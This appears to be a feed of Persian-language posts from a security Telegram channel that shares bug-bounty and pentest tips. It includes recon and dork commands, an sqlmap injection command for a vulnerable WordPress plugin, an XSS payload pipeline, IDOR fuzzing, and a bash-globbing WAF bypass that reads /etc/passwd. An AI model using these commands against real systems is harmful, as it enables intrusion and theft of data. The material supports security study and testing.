🔎 ابزارهای مختلف جستجو
تقریباً همه شما در مورد Google Dorks شنیده اید، اما dorks برای Yandex، DuckDuckGo، Bing، VirusTotal، Github، Shodan و غیره بسیار کمتر شناخته شده است.
در اینجا مجموعه کوچکی از ابزارهای کاربردی و پیوندهایی به لیست های dork برای ابزارهای مختلف جستجو وجود دارد.
Google, Bing, Ecosia, Yahoo или Yandex
https://github.com/Zarcolio/sitedorks
Google Dorks:
https://github.com/BullsEye0/google_dork_list
https://github.com/sushiwushi/bug-bounty-dorks
https://github.com/rootac355/SQL-injection-dorks-list
https://github.com/unexpectedBy/SQLi-Dork-Repository
https://github.com/thomasdesr/Google-dorks
https://github.com/arimogi/Google-Dorks
https://github.com/aleedhillon/7000-Google-Dork-List
DuckDuckGo dorks
https://github.com/d34dfr4m3/goDuck
Github Dorks:
https://github.com/techgaun/github-dorks
https://github.com/jcesarstef/ghhdb-Github-Hacking-Database
https://github.com/H4CK3RT3CH/github-dorks
Shodan Dorks:
https://github.com/humblelad/Shodan-Dorks
https://github.com/AustrianEnergyCERT/ICS_IoT_Shodan_Dorks
https://github.com/lothos612/shodan
https://github.com/jakejarvis/awesome-shodan-queries
https://github.com/IFLinfosec/shodan-dorks
Virus Total Dorks:
https://github.com/Neo23x0/vti-dorks
Binary Edge + Shodan + Google:
https://github.com/iGotRootSRC/Dorkers
#Web #Recon #Dork
@TryHackBox
@TryHackBoxOfficial
تقریباً همه شما در مورد Google Dorks شنیده اید، اما dorks برای Yandex، DuckDuckGo، Bing، VirusTotal، Github، Shodan و غیره بسیار کمتر شناخته شده است.
در اینجا مجموعه کوچکی از ابزارهای کاربردی و پیوندهایی به لیست های dork برای ابزارهای مختلف جستجو وجود دارد.
Google, Bing, Ecosia, Yahoo или Yandex
https://github.com/Zarcolio/sitedorks
Google Dorks:
https://github.com/BullsEye0/google_dork_list
https://github.com/sushiwushi/bug-bounty-dorks
https://github.com/rootac355/SQL-injection-dorks-list
https://github.com/unexpectedBy/SQLi-Dork-Repository
https://github.com/thomasdesr/Google-dorks
https://github.com/arimogi/Google-Dorks
https://github.com/aleedhillon/7000-Google-Dork-List
DuckDuckGo dorks
https://github.com/d34dfr4m3/goDuck
Github Dorks:
https://github.com/techgaun/github-dorks
https://github.com/jcesarstef/ghhdb-Github-Hacking-Database
https://github.com/H4CK3RT3CH/github-dorks
Shodan Dorks:
https://github.com/humblelad/Shodan-Dorks
https://github.com/AustrianEnergyCERT/ICS_IoT_Shodan_Dorks
https://github.com/lothos612/shodan
https://github.com/jakejarvis/awesome-shodan-queries
https://github.com/IFLinfosec/shodan-dorks
Virus Total Dorks:
https://github.com/Neo23x0/vti-dorks
Binary Edge + Shodan + Google:
https://github.com/iGotRootSRC/Dorkers
#Web #Recon #Dork
@TryHackBox
@TryHackBoxOfficial
GitHub
GitHub - Zarcolio/sitedorks: Search Google/Bing/Ecosia/DuckDuckGo/Yandex/Yahoo for a search term (dork) with a default set of websites…
Search Google/Bing/Ecosia/DuckDuckGo/Yandex/Yahoo for a search term (dork) with a default set of websites, bug bounty programs or custom collection. - Zarcolio/sitedorks
🔥2👎1
🏠 سرقت TLS در جستجوی نقاط پایانی جدید
ProjectDiscovery TLS خود را به نام tlsx منتشر کرد. برای توضیح کامل، لینک GitHub را ببینید، اما من برخی از ویژگی های راحت را برجسته می کنم.
اولین مورد، امکان مشاهده سریع نام سازمان در گواهی است. ما CIDRهایی را که ممکن است متعلق به تارگت ما باشد جمع آوری می کنیم و دستوری مانند:
دومین ویژگی جالب، جمع آوری subdomain ها از CN و SAN و ترکیب tlsx با dnsx برای جمع آوری غیرفعال زیر دامنه ها و سپس با httpx برای جستجوی سرویس وب زنده است:
#web #Recon
@TryHackBox
@TryHackBoxOfficial
ProjectDiscovery TLS خود را به نام tlsx منتشر کرد. برای توضیح کامل، لینک GitHub را ببینید، اما من برخی از ویژگی های راحت را برجسته می کنم.
اولین مورد، امکان مشاهده سریع نام سازمان در گواهی است. ما CIDRهایی را که ممکن است متعلق به تارگت ما باشد جمع آوری می کنیم و دستوری مانند:
echo 173.0.84.0/24 | tlsx -so
دومین ویژگی جالب، جمع آوری subdomain ها از CN و SAN و ترکیب tlsx با dnsx برای جمع آوری غیرفعال زیر دامنه ها و سپس با httpx برای جستجوی سرویس وب زنده است:
echo 173.0.84.0/24 | tlsx -san -cn -silent -resp-only | dnsx -silent | httpx
#web #Recon
@TryHackBox
@TryHackBoxOfficial
👍2
💉 بیش از 600000 سایت وردپرس در برابر تزریق SQL آسیب پذیر هستند.
WP Statistics
https://wordpress.org/plugins/wp-statistics/
یک افزونه وردپرس است که به صاحبان سایت اجازه می دهد تا آمار دقیق بازدیدکنندگان سایت خود را مشاهده کنند، از جمله صفحاتی که در سایت بازدید می کنند.
فراموش نکنید که بلافاصله افزونه را به روز کنید. سایت هایی که این افزونه را با نسخه <13.0.8 نصب کرده اند، در برابر تزریق SQL مبتنی بر زمان بدون احراز هویت آسیب پذیر هستند، که به مهاجمان اجازه می دهد به داده های حساس ذخیره شده در پایگاه داده سایت دسترسی پیدا کنند.
ما یک درخواست به
#Web #SQLi
@TryHackBox
@TryHackBoxOfficial
WP Statistics
https://wordpress.org/plugins/wp-statistics/
یک افزونه وردپرس است که به صاحبان سایت اجازه می دهد تا آمار دقیق بازدیدکنندگان سایت خود را مشاهده کنند، از جمله صفحاتی که در سایت بازدید می کنند.
فراموش نکنید که بلافاصله افزونه را به روز کنید. سایت هایی که این افزونه را با نسخه <13.0.8 نصب کرده اند، در برابر تزریق SQL مبتنی بر زمان بدون احراز هویت آسیب پذیر هستند، که به مهاجمان اجازه می دهد به داده های حساس ذخیره شده در پایگاه داده سایت دسترسی پیدا کنند.
ما یک درخواست به
wp-admin/admin.php
با پارامتر page=wps_pages_page
ارسال می کنیم. سپس باید مقادیر مخرب برای ID یا پارامترهای type تهیه کنید (این کار را می توان از طریق sqlmap انجام داد)sqlmap -u "http://192.168.1.54/wordpress/wp-admin/admin.php?ID=1&page=wps_pages_page&type=1" --technique=T --dbms="mysql" -p "ID" -b
#Web #SQLi
@TryHackBox
@TryHackBoxOfficial
WordPress.org
WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin
Get website traffic insights with GDPR/CCPA compliant, privacy-friendly analytics. Includes visitor data, stunning graphs, and no data sharing.
❌ خطاهای کنترل دسترسی در وردپرس
کنترل دسترسی نامناسب می تواند بسیار خطرناک باشد (P2)، که به مهاجم اجازه می دهد با انتخاب فرمت مورد نظر، اطلاعات حساس را بخواند، به عنوان مثال: (xml، txt، json ...)
این نقاط پایانی را به لیست پیمایش دایرکتوری خود اضافه کنید:
@TryHackBox
@TryHackBoxOfficial
کنترل دسترسی نامناسب می تواند بسیار خطرناک باشد (P2)، که به مهاجم اجازه می دهد با انتخاب فرمت مورد نظر، اطلاعات حساس را بخواند، به عنوان مثال: (xml، txt، json ...)
این نقاط پایانی را به لیست پیمایش دایرکتوری خود اضافه کنید:
/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=xml
/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=txt
#Web #WordPress@TryHackBox
@TryHackBoxOfficial
Try Hack Box
Photo
🔄
#Web #Recon
@TryHackBox
@TryHackBoxOfficial
خدمات وب در پورت های غیر استاندارد
برای یافتن اهداف بیشتر برای اسکن آسیبپذیری، باید نه تنها درگاههای وب استاندارد (80 و 443)، بلکه پورتهای غیراستاندارد، مانند 8080، 10000، 8443 و موارد دیگر را نیز بررسی کنید، که ممکن است سرویسهای وب در آنها قرار داشته باشند.
اگر کمی از Shodan و سرویسهای وب که در پورتهای غیر استاندارد اجرا میشوند، تجزیه و تحلیل کنیم، میتوانیم لیستی از رایجترین پورتهایی را که باید در مرحله شناسایی بررسی شوند، ارائه کنیم:
httpx -l targets.list -p 8080,10000,20000,2222,7080,9009,7443,2087,2096,8443,4100,2082,2083,2086,9999,2052,9001,9002,7000,7001,8082,8084,8085,8010,9000,2078,2080,2079,2053,2095,4000,5280,8888,9443,5800,631,8000,8008,8087,84,85,86,88,10125,9003,7071,8383,7547,3434,10443,8089,3004,81,4567,7081,82,444,1935,3000,9998,4433,4431,4443,83,90,8001,8099,80,300,443,591,593,832,981,1010,1311,2480,3128,3333,4243,4711,4712,4993,5000,5104,5108,6543,7396,7474,8014,8042,8069,8081,8088,8090,8091,8118,8123,8172,8222,8243,8280,8281,8333,8500,8834,8880,8983,9043,9060,9080,9090,9091,9200,9800,9981,12443,16080,18091,18092,20720,28017 -o livesites.result
#Web #Recon
@TryHackBox
@TryHackBoxOfficial
👍5
🖇 روش دیگری برای خودکارسازی جستجوی XSS .
ابزاری به نام freq می تواند برای خودکارسازی جستجوهای XSS و SQLi استفاده شود.
کافی است URL ها را از wayback جمع آوری کنید، مناسب ترین آنها را با استفاده از gf انتخاب کنید، موارد تکراری را با استفاده از uro حذف کنید، پیلود خود را با استفاده از qsreplace وارد کنید و آن را به فرکانس منتقل کنید.
#Web #XSS
@TryHackBox
@TryHackBoxOfficial
ابزاری به نام freq می تواند برای خودکارسازی جستجوهای XSS و SQLi استفاده شود.
کافی است URL ها را از wayback جمع آوری کنید، مناسب ترین آنها را با استفاده از gf انتخاب کنید، موارد تکراری را با استفاده از uro حذف کنید، پیلود خود را با استفاده از qsreplace وارد کنید و آن را به فرکانس منتقل کنید.
echo testphp.vulnweb.com | waybackurls | gf xss | uro | qsreplace '"><img src=x onerror=alert(1);>' | freq
#Web #XSS
@TryHackBox
@TryHackBoxOfficial
👍6🔥1
🔎 چند راه برای جستجوی پنل های مدیریت شرکت
1. استفاده از Google Dorks:
🗄 https://github.com/the-c0d3r/admin-finder
🗄 https://github.com/RedVirus0/Admin-Finder
🗄 https://github.com/mIcHyAmRaNe/okadminfinder3
🗄 https://github.com/penucuriCode/findlogin
🗄 https://github.com/fnk0c/cangibrina
4. استفاده از موتورهای جستجو:
Shodan:
#Web #Dork #Recon
@TryHackBox
@TryHackBoxOfficial
1. استفاده از Google Dorks:
site:target.com inurl:admin | administrator | adm | login | l0gin | wp-login
intitle:"login" "admin" site:target.com
intitle:"index of /admin" site:target.com
inurl:admin intitle:admin intext:admin
2. استفاده از httpx و wordlist :httpx -l hosts.txt -paths /root/admin-login.txt -threads 100 -random-agent -x GET,POST -tech-detect -status-code -follow-redirects -title -content-length
httpx -l hosts.txt-ports 80,443,8009,8080,8081,8090,8180,8443 -paths /root/admin-login.txt -threads 100 -random-agent -x GET,POST -tech-detect -status-code -follow-redirects -title -content-length
3. استفاده از برنامه های کاربردی:🗄 https://github.com/the-c0d3r/admin-finder
🗄 https://github.com/RedVirus0/Admin-Finder
🗄 https://github.com/mIcHyAmRaNe/okadminfinder3
🗄 https://github.com/penucuriCode/findlogin
🗄 https://github.com/fnk0c/cangibrina
4. استفاده از موتورهای جستجو:
Shodan:
ssl.cert.subject.cn:"company.com" http.title:"admin"
ssl:"company.com" http.title:"admin"
ssl.cert.subject.cn:"company.com" admin
ssl:"company.com" admin
Fofa:cert="company.com" && title="admin"
cert.subject="company" && title="admin"
cert="company.com" && body="admin"
cert.subject="company" && body="admin"
ZoomEye:ssl:company.com +title:"admin"
ssl:company.com +admin
Censys (IPv4):(services.tls.certificates.leaf_data.issuer.common_name:company.com) AND services.http.response.html_title:admin
(services.tls.certificates.leaf_data.issuer.common_name:company.com) AND services.http.response.body:admin
#Web #Dork #Recon
@TryHackBox
@TryHackBoxOfficial
GitHub
GitHub - the-c0d3r/admin-finder: Blazing fast admin panel finder with asyncio and aiohttp
Blazing fast admin panel finder with asyncio and aiohttp - the-c0d3r/admin-finder
👍1
🏃♂️ تبدیل خروجی ساده به هش برای جستجوی IDOR
گاهی اوقات لازم است ورودی را مستقیماً در کنسول به md5 / base64 / 32 و غیره تبدیل کنید. این می تواند مفید باشد به خصوص زمانی که به دنبال IDOR هستید و نقطه پایانی دارای مقدار هش است، مانند این:
برای حل این مشکل می توانید از یک اسکریپت bash ساده همراه با ffuf استفاده کنید.
فرض کنید یک نقطه پایانی دارید که پارامتر id را به شکل md5 می پذیرد. ما می توانیم آن را برای IDOR با استفاده از دستور زیر آزمایش کنیم که لیستی از اعداد 1 تا 1000 را ایجاد می کند:
#Web #IDOR #Bash
@TryHackBox
@TryHackBoxOfficial
گاهی اوقات لازم است ورودی را مستقیماً در کنسول به md5 / base64 / 32 و غیره تبدیل کنید. این می تواند مفید باشد به خصوص زمانی که به دنبال IDOR هستید و نقطه پایانی دارای مقدار هش است، مانند این:
https://targetdomain.com/user/3bf1114a986ba87ed28fc1b5884fc2f8
برای حل این مشکل می توانید از یک اسکریپت bash ساده همراه با ffuf استفاده کنید.
فرض کنید یک نقطه پایانی دارید که پارامتر id را به شکل md5 می پذیرد. ما می توانیم آن را برای IDOR با استفاده از دستور زیر آزمایش کنیم که لیستی از اعداد 1 تا 1000 را ایجاد می کند:
seq 1 1000 | hashit md5 | ffuf -w - -u https://targetdomain.com/user/FUZZ
#Web #IDOR #Bash
@TryHackBox
@TryHackBoxOfficial
👍1
⚠️ راهی آسان برای یافتن خطا در پاسخ های سرور
نظارت و دریافت اعلانها در مورد پیامهای خطای سرور بسیار مفید است، زیرا اغلب توسط حسابرسی که از سمت کاربر به برنامه نگاه میکند مورد توجه قرار نمیگیرند.
برای شناسایی حالت اشکال زدایی Symfony، خطاهای Sql، خطاهای Tomcat، خطاهای گسترش نسخه و موارد دیگر از طریق Burpsuite و httpx، این مراحل را دنبال کنید:
1. پسوند error-message-check را برای Burpsuite نصب کنید
2. یک scope تنظیم کنید و httpx را با تمام متدهای ممکن ( -x all ) اجرا کنید:
3. اسکن غیرفعال را در Burpsuite اجرا کنید.
#Web #BurpSuite
@TryHackBox
@TryHackBoxOfficial
نظارت و دریافت اعلانها در مورد پیامهای خطای سرور بسیار مفید است، زیرا اغلب توسط حسابرسی که از سمت کاربر به برنامه نگاه میکند مورد توجه قرار نمیگیرند.
برای شناسایی حالت اشکال زدایی Symfony، خطاهای Sql، خطاهای Tomcat، خطاهای گسترش نسخه و موارد دیگر از طریق Burpsuite و httpx، این مراحل را دنبال کنید:
1. پسوند error-message-check را برای Burpsuite نصب کنید
2. یک scope تنظیم کنید و httpx را با تمام متدهای ممکن ( -x all ) اجرا کنید:
httpx -l urls.txt -threads 100 -x all-http-proxy http://127.0.0.1:8080
3. اسکن غیرفعال را در Burpsuite اجرا کنید.
#Web #BurpSuite
@TryHackBox
@TryHackBoxOfficial
🔥2
🔬 آزمایشگاه های رایگان برای تمرین عملیات SSRF
این لیست شامل آزمایشگاههای آنلاین و آزمایشگاههایی است که میتوانید در محیط آزمایشی خودتان اجرا کنید.
🗄 PortSwigger SSRF Labs
🗄 Server-Side Request Forgery (SSRF) vulnerable Lab
🗄 Vulnado SSRF Lab
🗄 Snyk SSRF Lab
🗄 Kontra SSRF Lab
#Web #SSRF
@TryHackBox
@TryHackBoxOfficial
این لیست شامل آزمایشگاههای آنلاین و آزمایشگاههایی است که میتوانید در محیط آزمایشی خودتان اجرا کنید.
🗄 PortSwigger SSRF Labs
🗄 Server-Side Request Forgery (SSRF) vulnerable Lab
🗄 Vulnado SSRF Lab
🗄 Snyk SSRF Lab
🗄 Kontra SSRF Lab
#Web #SSRF
@TryHackBox
@TryHackBoxOfficial
👍3
This media is not supported in your browser
VIEW IN TELEGRAM
🔎 روش های جستجو برای پنل های مدیریت شرکت
1. استفاده از Google Dorks:
⏺ https://github.com/the-c0d3r/admin-finder
⏺ https://github.com/RedVirus0/Admin-Finder
⏺ https://github.com/mIcHyAmRaNe/okadminfinder3
⏺ https://github.com/penucuriCode/findlogin
⏺ https://github.com/fnk0c/cangibrina
#Web #Dorks #Recon
@TryHackBox
@TryHackBoxOfficial
1. استفاده از Google Dorks:
site:target.com inurl:admin | administrator | adm | login | l0gin | wp-login
intitle:"login" "admin" site:target.com
intitle:"index of /admin" site:target.com
inurl:admin intitle:admin intext:admin
2. استفاده از httpx و لیست کلمات :httpx -l hosts.txt -paths /root/admin-login.txt -threads 100 -random-agent -x GET,POST -tech-detect -status-code -follow-redirects -title -content-length
httpx -l hosts.txt-ports 80,443,8009,8080,8081,8090,8180,8443 -paths /root/admin-login.txt -threads 100 -random-agent -x GET,POST -tech-detect -status-code -follow-redirects -title -content-length
3. استفاده از برنامه های کاربردی:⏺ https://github.com/the-c0d3r/admin-finder
⏺ https://github.com/RedVirus0/Admin-Finder
⏺ https://github.com/mIcHyAmRaNe/okadminfinder3
⏺ https://github.com/penucuriCode/findlogin
⏺ https://github.com/fnk0c/cangibrina
#Web #Dorks #Recon
@TryHackBox
@TryHackBoxOfficial
👍1
👩💻
Fsociety - محیط پنتستینگ
Fsociety
یک محیط تست نفوذ و تست پس از بهره برداری است که تمام ابزارهای مورد استفاده در برنامه تلویزیونی مستر ربات را فراهم می کند.
— برخی از ابزارهای ویژه شامل: Nmaр, Setoolkit, WPScan, XSStrike, Cupp, Reaver, sqlmap, Arachni و ... .
فریم ورک را می توان بر روی گنو/لینوکس، ویندوز نصب کرد یا با داکر استفاده کرد.
https://github.com/Manisso/fsociety #Tools #Web #Mrrobot
@TryHackBox
@TryHackBoxOfficial
Fsociety - محیط پنتستینگ
Fsociety
یک محیط تست نفوذ و تست پس از بهره برداری است که تمام ابزارهای مورد استفاده در برنامه تلویزیونی مستر ربات را فراهم می کند.
— برخی از ابزارهای ویژه شامل: Nmaр, Setoolkit, WPScan, XSStrike, Cupp, Reaver, sqlmap, Arachni و ... .
فریم ورک را می توان بر روی گنو/لینوکس، ویندوز نصب کرد یا با داکر استفاده کرد.
https://github.com/Manisso/fsociety #Tools #Web #Mrrobot
@TryHackBox
@TryHackBoxOfficial
🔥3
📝 HackerOne: مجموعه ای از گزارش ها
خواندن گزارشهای سایر محققان اغلب به شما کمک میکند چیز جدیدی بیاموزید، به عنوان مثال، گزینههایی برای بهرهبرداری از یک آسیبپذیری خاص یا پیدا کردن بردار حملهای که قبلاً استفاده نکردهاید.
در زیر یک مخزن حاوی برترین گزارشهای باز از HackerOne است که بر اساس انواع آسیبپذیریها و برنامههایی که این آسیبپذیریها در آنها پیدا شدهاند، مرتب شدهاند.
⏺ GitHub
⏺ Google Docs
#Web #Report
@TryHackBox
@TryHackBoxOfficial
خواندن گزارشهای سایر محققان اغلب به شما کمک میکند چیز جدیدی بیاموزید، به عنوان مثال، گزینههایی برای بهرهبرداری از یک آسیبپذیری خاص یا پیدا کردن بردار حملهای که قبلاً استفاده نکردهاید.
در زیر یک مخزن حاوی برترین گزارشهای باز از HackerOne است که بر اساس انواع آسیبپذیریها و برنامههایی که این آسیبپذیریها در آنها پیدا شدهاند، مرتب شدهاند.
علاوه بر این، من لینکی به GoogleDocs ضمیمه کرده ام که حاوی بیش از 6200 گزارش مختلف است.
⏺ GitHub
⏺ Google Docs
#Web #Report
@TryHackBox
@TryHackBoxOfficial
🔥4
⚫️ بایپس فایروال برنامه وب (WAF) با استفاده از Globbing
بش میتواند بسط نام فایل را انجام دهد، پروسسی به نام globbing ، اما از مجموعه استاندارد عبارات منظم استفاده نمیکند.
اگر یک WAF (فایروال برنامه وب) وجود دارد که پیلودهای RCE (اجرای کد از راه دور) و LFI (شامل فایل محلی) را فیلتر می کند، می توانید با استفاده از جایگزینی آن را بایپس کنید.
در اینجا یک مثال است:
#Web #WAF
@TryHackBox
@TryHackBoxOfficial
بش میتواند بسط نام فایل را انجام دهد، پروسسی به نام globbing ، اما از مجموعه استاندارد عبارات منظم استفاده نمیکند.
اگر یک WAF (فایروال برنامه وب) وجود دارد که پیلودهای RCE (اجرای کد از راه دور) و LFI (شامل فایل محلی) را فیلتر می کند، می توانید با استفاده از جایگزینی آن را بایپس کنید.
در اینجا یک مثال است:
/usr/bin/cat /etc/passwd == /???/???/c?t$IFS/?t?/p?s?wdبه عنوان مثال، تمام ورودی های زیر باید "
? = هر واحد
* = هر رشته ای، از جمله رشته های با طول صفر!
$IFS = جداکننده فیلد داخلی در سیستم های یونیکس = فضا، تب یا خط جدید
/bin/cat /etc/passwd
" را در یک سیستم لینوکس معمولی اجرا کنند:/*/?at$IFS/???/???swdمی تونی امتحانش کنی!
/****/?at$IFS/???/*swd
/****/?at$IFS/???/*******swd
#Web #WAF
@TryHackBox
@TryHackBoxOfficial
👍1
⚙ همه در یک. ابزارهای هک
• Hackingtool
یک ابزار هک جامع است که شامل تمامی ابزارهای اصلی برای نفوذگران و هکرها می باشد.
• مخزن دارای 29.6 هزار ستاره است و دائماً به روز می شود. شامل ابزارهایی از دسته های زیر است:
- Anonymously Hiding Tools;
- Information gathering tools;
- Wordlist Generator;
- Wireless attack tools;
- SQL Injection Tools;
- Phishing attack tools;
- Web Attack tools;
- Post exploitation tools;
- Forensic tools;
- Payload creation tools;
- Exploit framework;
- Reverse engineering tools;
- DDOS Attack Tools;
- Remote Administrator Tools (RAT);
- XSS Attack Tools;
- Steganograhy tools;
- SocialMedia Bruteforce;
- Android Hacking tools;
- IDN Homograph Attack;
- Email Verify tools;
- Hash cracking tools;
- Wifi Deauthenticate;
- SocialMedia Finder;
- Payload Injector;
- Web crawling;
- Mix tools.
#Hack #tools
@TryHackBox
@TryHackBoxOfficial
• Hackingtool
یک ابزار هک جامع است که شامل تمامی ابزارهای اصلی برای نفوذگران و هکرها می باشد.
• مخزن دارای 29.6 هزار ستاره است و دائماً به روز می شود. شامل ابزارهایی از دسته های زیر است:
- Anonymously Hiding Tools;
- Information gathering tools;
- Wordlist Generator;
- Wireless attack tools;
- SQL Injection Tools;
- Phishing attack tools;
- Web Attack tools;
- Post exploitation tools;
- Forensic tools;
- Payload creation tools;
- Exploit framework;
- Reverse engineering tools;
- DDOS Attack Tools;
- Remote Administrator Tools (RAT);
- XSS Attack Tools;
- Steganograhy tools;
- SocialMedia Bruteforce;
- Android Hacking tools;
- IDN Homograph Attack;
- Email Verify tools;
- Hash cracking tools;
- Wifi Deauthenticate;
- SocialMedia Finder;
- Payload Injector;
- Web crawling;
- Mix tools.
➡️ https://github.com/Z4nzu/hackingtool
#Hack #tools
@TryHackBox
@TryHackBoxOfficial
👍3🔥1
Media is too big
VIEW IN TELEGRAM
🏃♂️ روش SSRF .
جریانی از KathanP19 ، اختصاص داده شده به روش جستجوی آسیبپذیریهای SSRF در حالت دستی و خودکار.
جعل درخواست سمت سرور (SSRF) نوعی آسیب پذیری برنامه وب است که به مهاجم اجازه می دهد درخواست های HTTP دلخواه را از یک برنامه وب آسیب پذیر به یک سرور خارجی ارسال کند. یک برنامه را می توان فریب داد تا درخواست های مخرب را به سیستم های داخلی ارسال کند که می تواند منجر به افشای داده های حساس یا سایر مسائل امنیتی شود.
#SSRF #Web
@TryHackBox
@TryHackBoxOfficial
جریانی از KathanP19 ، اختصاص داده شده به روش جستجوی آسیبپذیریهای SSRF در حالت دستی و خودکار.
جعل درخواست سمت سرور (SSRF) نوعی آسیب پذیری برنامه وب است که به مهاجم اجازه می دهد درخواست های HTTP دلخواه را از یک برنامه وب آسیب پذیر به یک سرور خارجی ارسال کند. یک برنامه را می توان فریب داد تا درخواست های مخرب را به سیستم های داخلی ارسال کند که می تواند منجر به افشای داده های حساس یا سایر مسائل امنیتی شود.
#SSRF #Web
@TryHackBox
@TryHackBoxOfficial
👍5
🗂 مجموعه ای از ویدئوها در مورد سوء استفاده از آسیب پذیری های برنامه های وب
مخزن زیر شامل مجموعه ای از ویدیوها در مورد آزمایش برنامه های وب برای آسیب پذیری های مختلف است.
- برای راحتی، محتوا بسته به نوع حملات و آسیب پذیری ها به دسته بندی ها تقسیم می شود.
#Web #Vulnerability
https://github.com/xalgord/Massive-Web-Application-Penetration-Testing-Bug-Bounty-Notes
@TryHackBox
مخزن زیر شامل مجموعه ای از ویدیوها در مورد آزمایش برنامه های وب برای آسیب پذیری های مختلف است.
- برای راحتی، محتوا بسته به نوع حملات و آسیب پذیری ها به دسته بندی ها تقسیم می شود.
#Web #Vulnerability
https://github.com/xalgord/Massive-Web-Application-Penetration-Testing-Bug-Bounty-Notes
@TryHackBox
🔎 CloudSploit
- ابزاری برای هک کردن پلتفرم های ابری
- این یک پروژه منبع باز است، حاوی اسکریپت هایی برای تشخیص خطاهای پیکربندی، خطاهای رایج و تهدیدات امنیتی است.
قابل ارتقا با افزونه ها می تواند هم Docker و هم SelfHost را انجام دهد. این کیت شامل یک کتابچه راهنمای آموزشی روز است که نقطه به نقطه چیستی و چرایی آن را توضیح می دهد.
#Web #Recon
https://github.com/aquasecurity/cloudsploit
@TryHackBox
- ابزاری برای هک کردن پلتفرم های ابری
- این یک پروژه منبع باز است، حاوی اسکریپت هایی برای تشخیص خطاهای پیکربندی، خطاهای رایج و تهدیدات امنیتی است.
قابل ارتقا با افزونه ها می تواند هم Docker و هم SelfHost را انجام دهد. این کیت شامل یک کتابچه راهنمای آموزشی روز است که نقطه به نقطه چیستی و چرایی آن را توضیح می دهد.
طراحی شده برای نفوذ به سیستم عامل های ابری مانند:
1. Amazon Web Services
2. Microsoft Azure
3. Google Cloud Platform
4. Oracle Cloud Infrastructure
5. GitHub
#Web #Recon
https://github.com/aquasecurity/cloudsploit
@TryHackBox
OWASP Amass
- ابزار تجزیه و تحلیل وب سایت
OWASP Amass
ابزاری است که برای خودکارسازی پروسس جمع آوری اطلاعات در مورد شبکه های تارگت به منظور تست نفوذ طراحی شده است.
— این ابزار طیف گسترده ای از توابع، از جمله جستجو برای زیر دامنه ها، جستجو برای هاست های فعال، تجزیه و تحلیل سوابق DNS و بیشتر ارائه می دهد.
#OWASP #Web
https://github.com/owasp-amass/amass
@TryHackBox
- ابزار تجزیه و تحلیل وب سایت
OWASP Amass
ابزاری است که برای خودکارسازی پروسس جمع آوری اطلاعات در مورد شبکه های تارگت به منظور تست نفوذ طراحی شده است.
— این ابزار طیف گسترده ای از توابع، از جمله جستجو برای زیر دامنه ها، جستجو برای هاست های فعال، تجزیه و تحلیل سوابق DNS و بیشتر ارائه می دهد.
#OWASP #Web
https://github.com/owasp-amass/amass
@TryHackBox
🖥 مخزن: Vuls – اسکنر آسیب پذیری
Vuls
یک اسکنر آسیبپذیری منبع باز برای Linux، FreeBSD، Container، WordPress، کتابخانههای زبان برنامهنویسی، دستگاههای شبکه است که در Go نوشته شده است.
- این ابزار تجزیه و تحلیل آسیب پذیری های نرم افزار نصب شده بر روی سیستم را خودکار می کند ، که انجام دستی در یک محیط تولید بسیار دشوار است.
https://github.com/future-architect/vuls?tab=readme-ov-file
#Web #Redteam #Recon
@TryHackBox
Vuls
یک اسکنر آسیبپذیری منبع باز برای Linux، FreeBSD، Container، WordPress، کتابخانههای زبان برنامهنویسی، دستگاههای شبکه است که در Go نوشته شده است.
- این ابزار تجزیه و تحلیل آسیب پذیری های نرم افزار نصب شده بر روی سیستم را خودکار می کند ، که انجام دستی در یک محیط تولید بسیار دشوار است.
https://github.com/future-architect/vuls?tab=readme-ov-file
#Web #Redteam #Recon
@TryHackBox
GitHub
GitHub - future-architect/vuls: Agent-less vulnerability scanner for Linux, FreeBSD, Container, WordPress, Programming language…
Agent-less vulnerability scanner for Linux, FreeBSD, Container, WordPress, Programming language libraries, Network devices - future-architect/vuls